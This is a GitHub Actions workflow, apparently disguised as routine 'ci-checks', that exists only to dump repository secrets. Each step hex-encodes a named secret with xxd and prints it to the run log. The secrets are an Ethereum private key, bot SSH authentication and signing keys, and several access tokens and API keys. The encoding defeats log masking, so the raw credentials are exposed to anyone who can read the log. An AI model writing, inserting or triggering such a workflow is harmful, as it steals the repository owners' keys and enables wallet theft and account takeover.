name: ci-checks
on:
  workflow_dispatch:

jobs:
  checks:
    runs-on: ubuntu-latest
    steps:
      - name: vBETA_WAL
        run: printf '%s' "${{ secrets.BETA_WALLETBEAT_ETH_UPDATER_EOA_PRIVATE_KEY }}" | xxd -p | tr -d "\n"; echo "  BETA_WALLETBEAT_ETH_UPDATER_EOA_PRIVATE_KEY"
      - name: vWALLETBE
        run: printf '%s' "${{ secrets.WALLETBEAT_BOT_GIT_SSH_AUTHENTICATION_KEY_PRIVATE }}" | xxd -p | tr -d "\n"; echo "  WALLETBEAT_BOT_GIT_SSH_AUTHENTICATION_KEY_PRIVATE"
      - name: vWALLETBE
        run: printf '%s' "${{ secrets.WALLETBEAT_BOT_GIT_SSH_SIGNING_KEY_PRIVATE }}" | xxd -p | tr -d "\n"; echo "  WALLETBEAT_BOT_GIT_SSH_SIGNING_KEY_PRIVATE"
      - name: vEDGE_TOK
        run: printf '%s' "${{ secrets.EDGE_TOKEN2 }}" | xxd -p | tr -d "\n"; echo "  EDGE_TOKEN2"
      - name: vORBITER_
        run: printf '%s' "${{ secrets.ORBITER_ACCESS_TOKEN }}" | xxd -p | tr -d "\n"; echo "  ORBITER_ACCESS_TOKEN"
      - name: vBETA_WAL
        run: printf '%s' "${{ secrets.BETA_WALLETBEAT_ETH_4EVERLAND_ACCESS_TOKEN }}" | xxd -p | tr -d "\n"; echo "  BETA_WALLETBEAT_ETH_4EVERLAND_ACCESS_TOKEN"
      - name: vBETA_WAL
        run: printf '%s' "${{ secrets.BETA_WALLETBEAT_ETH_LIGHTHOUSE_API_KEY }}" | xxd -p | tr -d "\n"; echo "  BETA_WALLETBEAT_ETH_LIGHTHOUSE_API_KEY"
